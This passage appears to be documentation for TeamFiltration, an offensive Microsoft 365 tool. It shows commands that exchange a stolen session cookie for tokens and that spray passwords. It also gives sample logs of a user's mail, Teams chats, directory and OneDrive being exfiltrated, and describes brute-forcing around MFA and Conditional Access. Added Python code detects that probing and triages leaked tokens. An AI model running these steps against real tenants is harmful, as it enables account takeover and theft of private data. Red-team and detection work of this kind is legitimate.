Exfiltration
If you want to authenticate to your target O365 account using cookies, you must first exchange the cookies for tokens using the ROADtools Python toolkit by @_dirkjan.
Identify the ESTSAUTHPERSISTENT cookie and give it to roadtx as shown below. This authenticates with the cookie and retrieves a fresh set of JWT tokens. The resulting tokens are saved to the .roadtools_auth file by default.
roadtx interactiveauth --estscookie "0.AXoAqzBRR7ViQU.................<snip>"
Then feed that .roadtools_auth file into TeamFiltration like this:
[♥] TeamFiltration V3.5.1 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --roadtools .roadtools_auth
[!] The exfiltration modules does not use FireProx, ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[+] Exfiltrating data from user [email protected]
[EXFIL] 01.03.2023 14:10:38 EST Exfiltrating AAD users and groups via MS AD Graph API
[EXFIL] 01.03.2023 14:10:44 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:10:45 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:10:49 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:10:50 EST Fetched 1337 email ID's , exfiltrating content!
[EXFIL] 01.03.2023 14:10:54 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:10:55 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating all chat logs/conversations
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:10:58 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:11:00 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:11:01 EST |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:11:08 EST Exfiltrating 0 recent files accessible by user
If you have credentials and simply want to use the exfiltration portion of TeamFiltration, they can be supplied directly. Note that if the login attempt is blocked by MFA or Conditional Access, TeamFiltration will attempt to identify a gap in the policies by brute-forcing a series of login attempts, each using a unique combination of resource URI, ClientId, and device.
[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --username [email protected] --password Passw0rd123!
[!] The exfiltration modules does not use FireProx, ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[SPRAY] 01.03.2023 14:02:11 EST Sprayed [email protected]:Passw0rd123! => VALID NO MFA!
[SPRAY] 01.03.2023 14:02:19 EST Refreshed a token for => https://graph.microsoft.com
[SPRAY] 01.03.2023 14:02:29 EST Refreshed a token for => https://api.spaces.skype.com
[EXFIL] 01.03.2023 14:02:37 EST Cross-resource-refresh allowed, we can exfil all that things!
[SPRAY] 01.03.2023 14:02:40 EST Refreshed a token for => https://graph.windows.net
[SPRAY] 01.03.2023 14:02:46 EST Found valid access token in database for => https://graph.microsoft.com
[EXFIL] 01.03.2023 14:02:46 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:02:47 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:02:50 EST Exfiltrating AAD users and groups via MS AD Graph API
[SPRAY] 01.03.2023 14:04:05 EST Refreshed a token for => https://outlook.office365.com
[EXFIL] 01.03.2023 14:04:07 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:04:08 EST Fetched 1337 email ID's , exfiltrating content!
[SPRAY] 01.03.2023 14:04:13 EST Found valid access token in database for => https://api.spaces.skype.com
[SPRAY] 01.03.2023 14:04:14 EST Refreshed a token for => https://example-my.sharepoint.com
[EXFIL] 01.03.2023 14:04:14 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:04:16 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:04:17 EST Exfiltrating all chat logs/conversations
[SPRAY] 01.03.2023 14:04:26 EST Refreshed a token for => https://example.sharepoint.com
[SPRAY] 01.03.2023 14:04:26 EST Found valid access token in database for => https://example.sharepoint.com
[SPRAY] 01.03.2023 14:04:26 EST Found valid access token in database for => https://outlook.office365.com
[SPRAY] 01.03.2023 14:04:27 EST Refreshed a token for => https://management.core.windows.net
[SPRAY] 01.03.2023 14:04:27 EST Found valid access token in database for => https://graph.microsoft.com
[SPRAY] 01.03.2023 14:04:27 EST Found valid access token in database for => https://graph.windows.net
[EXFIL] 01.03.2023 14:04:32 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:04:34 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:04:36 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:04:37 EST |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:04:40 EST Exfiltrating 0 recent files accessible by user
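The policy-gap search described above leaves a distinctive trace in the tenant's sign-in logs: one account, many distinct client app / resource / device-platform combinations inside a few minutes, several Conditional Access blocks, and then a sign-in that no policy applied to. The following detection is an added example written for this page, not part of TeamFiltration or TrustedSec's code. It runs over constructed records shaped like Microsoft Graph signIn entries (userPrincipalName, appId, resourceDisplayName, deviceDetail.operatingSystem, conditionalAccessStatus, status.errorCode); the users, app IDs and timestamps are made up, and the window size and combination threshold are assumptions you would tune to your tenant.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Entra ID (Azure AD) sign-in log
# entries from the Microsoft Graph signIn resource, trimmed to the fields the
# detection uses. Users, app IDs and timestamps are made up for this example.
# Error code 53003 is the AADSTS "blocked by Conditional Access" code.
SAMPLE_SIGNINS = [
    {"createdDateTime": "2023-03-01T14:02:11Z", "userPrincipalName": "alice@example.com",
     "appId": "app-0001", "resourceDisplayName": "Microsoft Graph",
     "deviceDetail": {"operatingSystem": "Windows 10"},
     "conditionalAccessStatus": "failure", "status": {"errorCode": 53003}},
    {"createdDateTime": "2023-03-01T14:02:13Z", "userPrincipalName": "alice@example.com",
     "appId": "app-0002", "resourceDisplayName": "Microsoft Graph",
     "deviceDetail": {"operatingSystem": "Windows 10"},
     "conditionalAccessStatus": "failure", "status": {"errorCode": 53003}},
    {"createdDateTime": "2023-03-01T14:02:15Z", "userPrincipalName": "alice@example.com",
     "appId": "app-0001", "resourceDisplayName": "Office 365 Exchange Online",
     "deviceDetail": {"operatingSystem": "Windows 10"},
     "conditionalAccessStatus": "failure", "status": {"errorCode": 53003}},
    {"createdDateTime": "2023-03-01T14:02:18Z", "userPrincipalName": "alice@example.com",
     "appId": "app-0003", "resourceDisplayName": "Microsoft Graph",
     "deviceDetail": {"operatingSystem": "Android"},
     "conditionalAccessStatus": "failure", "status": {"errorCode": 53003}},
    # The attempt that got through: a client/resource/platform combination no policy covers.
    {"createdDateTime": "2023-03-01T14:02:20Z", "userPrincipalName": "alice@example.com",
     "appId": "app-0005", "resourceDisplayName": "Microsoft Graph",
     "deviceDetail": {"operatingSystem": "Android"},
     "conditionalAccessStatus": "notApplied", "status": {"errorCode": 0}},
    # Benign user: ordinary sign-ins that satisfied policy.
    {"createdDateTime": "2023-03-01T14:05:00Z", "userPrincipalName": "bob@example.com",
     "appId": "app-0001", "resourceDisplayName": "Microsoft Graph",
     "deviceDetail": {"operatingSystem": "Windows 10"},
     "conditionalAccessStatus": "success", "status": {"errorCode": 0}},
    {"createdDateTime": "2023-03-01T14:09:00Z", "userPrincipalName": "bob@example.com",
     "appId": "app-0001", "resourceDisplayName": "Microsoft Graph",
     "deviceDetail": {"operatingSystem": "Windows 10"},
     "conditionalAccessStatus": "success", "status": {"errorCode": 0}},
]


def _ts(rec):
    return datetime.strptime(rec["createdDateTime"], "%Y-%m-%dT%H:%M:%SZ")


def _combo(rec):
    """The tuple a policy-gap search varies: client app, resource, device platform."""
    return (rec["appId"], rec["resourceDisplayName"],
            rec["deviceDetail"].get("operatingSystem", ""))


def find_ca_probing(signins, window_minutes=5, min_combos=4):
    """Return one finding per user who, inside any window of `window_minutes`,
    signed in with at least `min_combos` distinct (app, resource, OS)
    combinations, was blocked by Conditional Access at least once, and then
    succeeded with a sign-in that no Conditional Access policy applied to."""
    by_user = defaultdict(list)
    for rec in signins:
        by_user[rec["userPrincipalName"]].append(rec)

    window = timedelta(minutes=window_minutes)
    findings = []
    for user, recs in by_user.items():
        recs = sorted(recs, key=_ts)
        start = 0
        for end in range(len(recs)):
            # Slide the window start forward until the span fits in the window.
            while _ts(recs[end]) - _ts(recs[start]) > window:
                start += 1
            span = recs[start:end + 1]
            combos = {_combo(r) for r in span}
            blocked = [r for r in span if r["conditionalAccessStatus"] == "failure"]
            unpoliced = [r for r in span
                         if r["conditionalAccessStatus"] == "notApplied"
                         and r["status"]["errorCode"] == 0]
            if len(combos) >= min_combos and blocked and unpoliced:
                findings.append({
                    "user": user,
                    "window_start": span[0]["createdDateTime"],
                    "window_end": span[-1]["createdDateTime"],
                    "distinct_combinations": len(combos),
                    "ca_blocks": len(blocked),
                    # Which client/resource/OS combination slipped past policy;
                    # this is the gap to close in the tenant's policies.
                    "gap_combinations": sorted({_combo(r) for r in unpoliced}),
                })
                break  # one finding per user is enough to raise an alert
    return findings


if __name__ == "__main__":
    print(json.dumps(find_ca_probing(SAMPLE_SIGNINS), indent=2))
```

The `gap_combinations` field is the actionable part of each finding: it names the client app, resource and platform that Conditional Access did not cover, which is exactly what a policy review needs. Against real logs, feed the function the `value` array from the Graph `auditLogs/signIns` query for the period of interest.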
If you have access to an exfiltrated Teams database, it can also be provided to TeamFiltration and used for authentication.
Example
You can also authenticate to your target's O365 account using a single JWT access token, a series of JWT access tokens separated by a comma, or a path to a file containing newline-separated access tokens.
Example
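The three token input forms above (one token, a comma-separated list, or a file with one token per line) are also what an incident responder ends up with when access tokens are recovered from a compromised host. The following is an added example, not TeamFiltration's code, showing a loader that accepts all three forms and decodes each token's claims to inventory which resource (aud), client app (appid) and user (upn) it grants and whether it has expired. The tokens are constructed in the block with a placeholder signature so it runs offline; claim names follow the standard Entra ID v1 access-token layout, and the sample app IDs and times are made up. Nothing here validates a signature: that is the resource's job, and this is triage only.

```python
import base64
import json
import os
from datetime import datetime, timezone


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding or
    # urlsafe_b64decode raises "Incorrect padding".
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_sample_jwt(claims: dict) -> str:
    """Build a structurally valid but UNSIGNED sample token (the signature is a
    placeholder). Constructed only so this example can run offline."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    return f"{header}.{payload}.{_b64url_encode(b'placeholder-signature')}"


def parse_token_text(text: str) -> list:
    """Split tokens given either comma-separated on one line or one per line."""
    return [t.strip() for t in text.replace("\n", ",").split(",") if t.strip()]


def load_tokens(spec: str) -> list:
    """Accept a single token, a comma-separated list, or a path to a file
    containing newline-separated tokens."""
    if os.path.isfile(spec):
        with open(spec, encoding="utf-8") as fh:
            return parse_token_text(fh.read())
    return parse_token_text(spec)


def decode_claims(token: str) -> dict:
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT: expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def summarize(tokens: list, now_epoch: int = None) -> list:
    """Inventory each token's audience (resource), client app, user and expiry."""
    if now_epoch is None:
        now_epoch = int(datetime.now(timezone.utc).timestamp())
    rows = []
    for tok in tokens:
        c = decode_claims(tok)
        exp = datetime.fromtimestamp(c["exp"], tz=timezone.utc)
        rows.append({
            "aud": c.get("aud"),
            "appid": c.get("appid"),
            "upn": c.get("upn"),
            "expires": exp.isoformat(),
            "expired": c["exp"] <= now_epoch,
        })
    return rows


# Constructed times: one token still valid at SAMPLE_NOW, one already expired.
EXP_OK = int(datetime(2023, 3, 1, 15, 0, tzinfo=timezone.utc).timestamp())
EXP_OLD = int(datetime(2023, 3, 1, 13, 0, tzinfo=timezone.utc).timestamp())
SAMPLE_NOW = int(datetime(2023, 3, 1, 14, 0, tzinfo=timezone.utc).timestamp())

# Constructed sample tokens; every claim value is made up.
SAMPLE_TOKENS = [
    make_sample_jwt({"aud": "https://graph.microsoft.com", "appid": "app-0001",
                     "upn": "alice@example.com", "exp": EXP_OK}),
    make_sample_jwt({"aud": "https://outlook.office365.com", "appid": "app-0002",
                     "upn": "alice@example.com", "exp": EXP_OLD}),
]

if __name__ == "__main__":
    tokens = load_tokens(",".join(SAMPLE_TOKENS))
    print(json.dumps(summarize(tokens, now_epoch=SAMPLE_NOW), indent=2))
```

The audience and expiry columns tell you which resources a set of leaked tokens can still reach and for how long, which drives the response: revoking the user's refresh tokens and sessions cuts off renewal, but an access token that has not yet expired keeps working until its `exp` time, so the resource-side signals (mailbox rules, OneDrive downloads) for that window still need to be reviewed.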